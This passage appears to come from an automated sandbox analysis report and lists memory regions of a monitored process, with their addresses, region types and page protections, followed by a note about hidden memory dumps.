|
page read and write
|
||
E0939FF000
|
stack
|
page read and write
|
||
20FEA2F0000
|
trusted library allocation
|
page read and write
|
||
16891BE0000
|
heap
|
page read and write
|
||
1C280AF4000
|
heap
|
page read and write
|
||
24E81C72000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
2905D554000
|
heap
|
page read and write
|
||
2216E9C3000
|
heap
|
page read and write
|
||
21CED910000
|
heap
|
page read and write
|
||
3A2B000
|
stack
|
page read and write
|
||
24E81C34000
|
trusted library allocation
|
page read and write
|
||
165C23B000
|
stack
|
page read and write
|
||
16891DA0000
|
heap
|
page read and write
|
||
9ED6F79000
|
stack
|
page read and write
|
||
7FFD9B816000
|
trusted library allocation
|
page read and write
|
||
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
2216C7E0000
|
heap
|
page read and write
|
||
168ABBA1000
|
heap
|
page read and write
|
||
16E0005D000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
1B9945EA000
|
trusted library allocation
|
page read and write
|
||
23A4A8D0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BA12000
|
trusted library allocation
|
page read and write
|
||
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
1EA3F0AB000
|
trusted library allocation
|
page read and write
|
||
29B1BD53000
|
trusted library allocation
|
page read and write
|
||
5B0F3FF000
|
stack
|
page read and write
|
||
1C280A90000
|
heap
|
page readonly
|
||
1B9ABFDA000
|
heap
|
page read and write
|
||
E093C7C000
|
stack
|
page read and write
|
||
29B1C0BD000
|
trusted library allocation
|
page read and write
|
||
24E81B7F000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
D32EA7F000
|
stack
|
page read and write
|
||
16E6F2D0000
|
heap
|
page read and write
|
||
445AC4F000
|
stack
|
page read and write
|
||
1C280898000
|
heap
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
168ABC18000
|
heap
|
page read and write
|
||
30AF000
|
stack
|
page read and write
|
||
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
29B189FC000
|
heap
|
page read and write
|
||
20FEBC90000
|
heap
|
page read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page execute and read and write
|
||
2102CD68000
|
heap
|
page read and write
|
||
29B32923000
|
heap
|
page read and write
|
||
F5E1FB000
|
stack
|
page read and write
|
||
2102ED9E000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
B51DC3B000
|
stack
|
page read and write
|
||
29B1B3E4000
|
trusted library allocation
|
page read and write
|
||
7FFD9B764000
|
trusted library allocation
|
page read and write
|
||
2216E9A2000
|
heap
|
page read and write
|
||
7FFD9B93F000
|
trusted library allocation
|
page read and write
|
||
20FEC1C1000
|
heap
|
page read and write
|
||
1B994661000
|
trusted library allocation
|
page read and write
|
||
1C29AB30000
|
heap
|
page read and write
|
||
155C5119000
|
heap
|
page read and write
|
||
2102CDBC000
|
heap
|
page read and write
|
||
21046C6D000
|
heap
|
page read and write
|
||
2216C9B0000
|
heap
|
page read and write
|
||
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
9ED6932000
|
stack
|
page read and write
|
||
7FFD9B7EC000
|
trusted library allocation
|
page execute and read and write
|
||
1208E710000
|
heap
|
page execute and read and write
|
||
155ACD70000
|
trusted library allocation
|
page read and write
|
||
21CEFAAB000
|
heap
|
page read and write
|
||
7FFD9B9B9000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9AE000
|
trusted library allocation
|
page read and write
|
||
2216E9B2000
|
heap
|
page read and write
|
||
7FFD9B960000
|
trusted library allocation
|
page execute and read and write
|
||
23A52F70000
|
heap
|
page read and write
|
||
29B1A998000
|
trusted library allocation
|
page read and write
|
||
332F000
|
stack
|
page read and write
|
||
7FFD9B846000
|
trusted library allocation
|
page read and write
|
||
293CD4F000
|
unkown
|
page read and write
|
||
C7B537000
|
stack
|
page read and write
|
||
1311B5E0000
|
heap
|
page read and write
|
||
23A38D20000
|
heap
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
1AFAF913000
|
heap
|
page read and write
|
||
2216C839000
|
heap
|
page read and write
|
||
155AD300000
|
trusted library allocation
|
page read and write
|
||
7FFD9B8B0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B7AB000
|
trusted library allocation
|
page read and write
|
||
23A3B040000
|
trusted library allocation
|
page read and write
|
||
155ACC31000
|
trusted library allocation
|
page read and write
|
||
24E99D40000
|
heap
|
page read and write
|
||
7FFD9B80C000
|
trusted library allocation
|
page execute and read and write
|
||
23A52D00000
|
heap
|
page read and write
|
||
1311B79C000
|
heap
|
page read and write
|
||
16E6F350000
|
heap
|
page read and write
|
||
1AFAD620000
|
heap
|
page read and write
|
||
16891D20000
|
heap
|
page read and write
|
||
D22B0FF000
|
stack
|
page read and write
|
||
29B2A4FF000
|
trusted library allocation
|
page read and write
|
||
21CEF831000
|
heap
|
page read and write
|
||
1311B900000
|
heap
|
page read and write
|
||
1AFAF5A1000
|
heap
|
page read and write
|
||
29B32A30000
|
trusted library section
|
page read and write
|
||
24E99F13000
|
heap
|
page read and write
|
||
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
C7B63C000
|
stack
|
page read and write
|
||
20FEC48F000
|
heap
|
page read and write
|
||
2102CDE8000
|
heap
|
page read and write
|
||
29B18990000
|
heap
|
page read and write
|
||
1E09EFE000
|
stack
|
page read and write
|
||
29B1A460000
|
heap
|
page execute and read and write
|
||
20FEA310000
|
trusted library allocation
|
page read and write
|
||
1C282868000
|
trusted library allocation
|
page read and write
|
||
7FFD9B820000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
1C2808ED000
|
heap
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
168952A4000
|
trusted library allocation
|
page read and write
|
||
168ABEFA000
|
heap
|
page read and write
|
||
1B991F20000
|
heap
|
page read and write
|
||
2216E9F4000
|
heap
|
page read and write
|
||
1C29AB37000
|
heap
|
page read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
1208EB18000
|
trusted library allocation
|
page read and write
|
||
C7B4BE000
|
stack
|
page read and write
|
||
1209E751000
|
trusted library allocation
|
page read and write
|
||
120A6C24000
|
heap
|
page read and write
|
||
2102CD7E000
|
heap
|
page read and write
|
||
1208E851000
|
trusted library allocation
|
page read and write
|
||
7FFD9B952000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
7FFD9B901000
|
trusted library allocation
|
page read and write
|
||
1208CC70000
|
heap
|
page read and write
|
||
1EA3ECA5000
|
heap
|
page read and write
|
||
24EFFB6A000
|
heap
|
page read and write
|
||
131357CD000
|
heap
|
page read and write
|
||
23A5300D000
|
heap
|
page read and write
|
||
1DBF8080000
|
heap
|
page read and write
|
||
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
1AFAF914000
|
heap
|
page read and write
|
||
16E6F3F0000
|
heap
|
page execute and read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
4459CFD000
|
stack
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
16891E30000
|
trusted library allocation
|
page read and write
|
||
16E6F9EC000
|
heap
|
page read and write
|
||
2409B3A0000
|
heap
|
page read and write
|
||
20FEA11B000
|
heap
|
page read and write
|
||
5B0F4FF000
|
stack
|
page read and write
|
||
1B991F60000
|
trusted library allocation
|
page read and write
|
||
E5F80FE000
|
stack
|
page read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page execute and read and write
|
||
1AFAF97D000
|
heap
|
page read and write
|
||
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
1B991FE0000
|
heap
|
page read and write
|
||
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
16893720000
|
trusted library allocation
|
page read and write
|
||
1208E7D7000
|
trusted library allocation
|
page read and write
|
||
120A6B7E000
|
heap
|
page read and write
|
||
1208E847000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
2102F2BB000
|
trusted library allocation
|
page read and write
|
||
7FFD9B79D000
|
trusted library allocation
|
page execute and read and write
|
||
1EA3EB80000
|
heap
|
page readonly
|
||
1208CAFC000
|
heap
|
page read and write
|
||
1210000
|
heap
|
page read and write
|
||
2216E9A0000
|
heap
|
page read and write
|
||
16891DB5000
|
heap
|
page read and write
|
||
16E00432000
|
trusted library allocation
|
page read and write
|
||
120A6B9A000
|
heap
|
page read and write
|
||
BB44F63000
|
stack
|
page read and write
|
||
7FFD9B911000
|
trusted library allocation
|
page read and write
|
||
2102CEA0000
|
heap
|
page read and write
|
||
23A38E04000
|
heap
|
page read and write
|
||
1AFAD960000
|
heap
|
page read and write
|
||
23A3B5B7000
|
trusted library allocation
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
1B991CD0000
|
heap
|
page read and write
|
||
2103E930000
|
trusted library allocation
|
page read and write
|
||
155ACC20000
|
heap
|
page read and write
|
||
1C29AB40000
|
heap
|
page read and write
|
||
155ACD37000
|
trusted library allocation
|
page read and write
|
||
155C5127000
|
heap
|
page read and write
|
||
1B991C50000
|
heap
|
page read and write
|
||
24099970000
|
heap
|
page read and write
|
||
155C5121000
|
heap
|
page read and write
|
||
7FFD9B876000
|
trusted library allocation
|
page execute and read and write
|
||
E5F77C9000
|
stack
|
page read and write
|
||
168A36B0000
|
trusted library allocation
|
page read and write
|
||
29B1BE64000
|
trusted library allocation
|
page read and write
|
||
7FFD9B932000
|
trusted library allocation
|
page read and write
|
||
2102ED8A000
|
trusted library allocation
|
page read and write
|
||
20FEBCC0000
|
heap
|
page read and write
|
||
7FFD9B972000
|
trusted library allocation
|
page read and write
|
||
155AD2E2000
|
trusted library allocation
|
page read and write
|
||
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
20FEA2A0000
|
heap
|
page read and write
|
||
F5DC7E000
|
stack
|
page read and write
|
||
29060FFB000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
1AFAF712000
|
heap
|
page read and write
|
||
155AB161000
|
heap
|
page read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
5E0000
|
heap
|
page read and write
|
||
1310000
|
heap
|
page read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
7FFD9B77D000
|
trusted library allocation
|
page execute and read and write
|
||
1EA3F35A000
|
trusted library allocation
|
page read and write
|
||
1208E8A8000
|
trusted library allocation
|
page read and write
|
||
16891CE0000
|
heap
|
page read and write
|
||
7FFD9B7AC000
|
trusted library allocation
|
page execute and read and write
|
||
84FB6FE000
|
stack
|
page read and write
|
||
155ACC53000
|
trusted library allocation
|
page read and write
|
||
C7B27D000
|
stack
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
29B1BCF3000
|
trusted library allocation
|
page read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
7FFD9B836000
|
trusted library allocation
|
page execute and read and write
|
||
1B993911000
|
trusted library allocation
|
page read and write
|
||
7FFD9B820000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B83C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA5E000
|
trusted library allocation
|
page read and write
|
||
1EA57590000
|
heap
|
page read and write
|
||
1311DA1B000
|
trusted library allocation
|
page read and write
|
||
155C50D4000
|
heap
|
page read and write
|
||
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
29B1A99C000
|
trusted library allocation
|
page read and write
|
||
1AFAF250000
|
heap
|
page read and write
|
||
7FFD9B820000
|
trusted library allocation
|
page read and write
|
||
1C280B50000
|
heap
|
page read and write
|
||
7FFD9B75D000
|
trusted library allocation
|
page execute and read and write
|
||
1EA3EF90000
|
heap
|
page execute and read and write
|
||
24E81BA6000
|
trusted library allocation
|
page read and write
|
||
29B32BC0000
|
heap
|
page read and write
|
||
1208CCE0000
|
heap
|
page readonly
|
||
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
4C0000
|
heap
|
page read and write
|
||
471000
|
remote allocation
|
page execute and read and write
|
||
168ABC46000
|
heap
|
page read and write
|
||
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
9ED6D7D000
|
stack
|
page read and write
|
||
24E99D37000
|
heap
|
page execute and read and write
|
||
1311B890000
|
heap
|
page readonly
|
||
29077494000
|
heap
|
page read and write
|
||
A053FB000
|
stack
|
page read and write
|
||
7FFD9B945000
|
trusted library allocation
|
page read and write
|
||
1C2808CD000
|
heap
|
page read and write
|
||
16891AE0000
|
heap
|
page read and write
|
||
2FAF000
|
stack
|
page read and write
|
||
7FFD9B90A000
|
trusted library allocation
|
page read and write
|
||
1311D4B8000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
2905D64A000
|
heap
|
page read and write
|
||
595264E000
|
stack
|
page read and write
|
||
131357C7000
|
heap
|
page read and write
|
||
16E0003E000
|
trusted library allocation
|
page read and write
|
||
1311B8A0000
|
trusted library allocation
|
page read and write
|
||
1208CAEA000
|
heap
|
page read and write
|
||
1B994604000
|
trusted library allocation
|
page read and write
|
||
24E99EA1000
|
heap
|
page read and write
|
||
1B993CA1000
|
trusted library allocation
|
page read and write
|
||
1EA3EB70000
|
trusted library allocation
|
page read and write
|
||
1EA3EDD0000
|
heap
|
page read and write
|
||
1208E84A000
|
trusted library allocation
|
page read and write
|
||
24EFFB4E000
|
heap
|
page read and write
|
||
23A4A861000
|
trusted library allocation
|
page read and write
|
||
21CEF79D000
|
heap
|
page read and write
|
||
A047EA000
|
stack
|
page read and write
|
||
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
2103E921000
|
trusted library allocation
|
page read and write
|
||
1EA3D150000
|
heap
|
page read and write
|
||
23A38DA6000
|
heap
|
page read and write
|
||
7FFD9BA3C000
|
trusted library allocation
|
page read and write
|
||
7FFD9B826000
|
trusted library allocation
|
page read and write
|
||
C7B7BE000
|
stack
|
page read and write
|
||
7FFD9B763000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
2216E631000
|
heap
|
page read and write
|
||
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
1E09D7E000
|
stack
|
page read and write
|
||
16E000FC000
|
trusted library allocation
|
page read and write
|
||
21CEFAB2000
|
heap
|
page read and write
|
||
1EA3ECA0000
|
heap
|
page read and write
|
||
24099880000
|
heap
|
page read and write
|
||
7FFD9B806000
|
trusted library allocation
|
page read and write
|
||
7FFD9B76B000
|
trusted library allocation
|
page read and write
|
||
21CEFAAA000
|
heap
|
page read and write
|
||
16891BC0000
|
heap
|
page read and write
|
||
29077610000
|
heap
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
2216E9A8000
|
heap
|
page read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
24E81B31000
|
trusted library allocation
|
page read and write
|
||
1B9943B0000
|
trusted library allocation
|
page read and write
|
||
1AFAF93C000
|
heap
|
page read and write
|
||
290775F0000
|
heap
|
page read and write
|
||
2907750F000
|
heap
|
page read and write
|
||
23A52F8C000
|
heap
|
page read and write
|
||
B51DB37000
|
stack
|
page read and write
|
||
1B993DE6000
|
trusted library allocation
|
page read and write
|
||
23A3ACF4000
|
trusted library allocation
|
page read and write
|
||
29B1BAC2000
|
trusted library allocation
|
page read and write
|
||
84FB7FC000
|
stack
|
page read and write
|
||
29B1BCD9000
|
trusted library allocation
|
page read and write
|
||
23A52E67000
|
heap
|
page execute and read and write
|
||
1C29A927000
|
heap
|
page execute and read and write
|
||
1C29A890000
|
heap
|
page execute and read and write
|
||
24EFFAF0000
|
heap
|
page read and write
|
||
155C52D6000
|
heap
|
page read and write
|
||
21047110000
|
heap
|
page read and write
|
||
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
7FFD9B764000
|
trusted library allocation
|
page read and write
|
||
53E10FF000
|
stack
|
page read and write
|
||
7FFD9B820000
|
trusted library allocation
|
page execute and read and write
|
||
1C29A9E9000
|
heap
|
page read and write
|
||
24EFFB72000
|
heap
|
page read and write
|
||
1E09DFD000
|
stack
|
page read and write
|
||
29B1A50E000
|
trusted library allocation
|
page read and write
|
||
2906F43C000
|
trusted library allocation
|
page read and write
|
||
16E6F960000
|
heap
|
page execute and read and write
|
||
1208CB91000
|
heap
|
page read and write
|
||
1311DA50000
|
trusted library allocation
|
page read and write
|
||
155AAFC0000
|
heap
|
page read and write
|
||
7FFD9B880000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B754000
|
trusted library allocation
|
page read and write
|
||
20FEC1D7000
|
heap
|
page read and write
|
||
1B994644000
|
trusted library allocation
|
page read and write
|
||
16891D80000
|
trusted library allocation
|
page read and write
|
||
16E6D94E000
|
heap
|
page read and write
|
||
16E00C04000
|
trusted library allocation
|
page read and write
|
||
7FFD9B836000
|
trusted library allocation
|
page read and write
|
||
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
29B189EE000
|
heap
|
page read and write
|
There are 2052 hidden memdumps, click here to show them.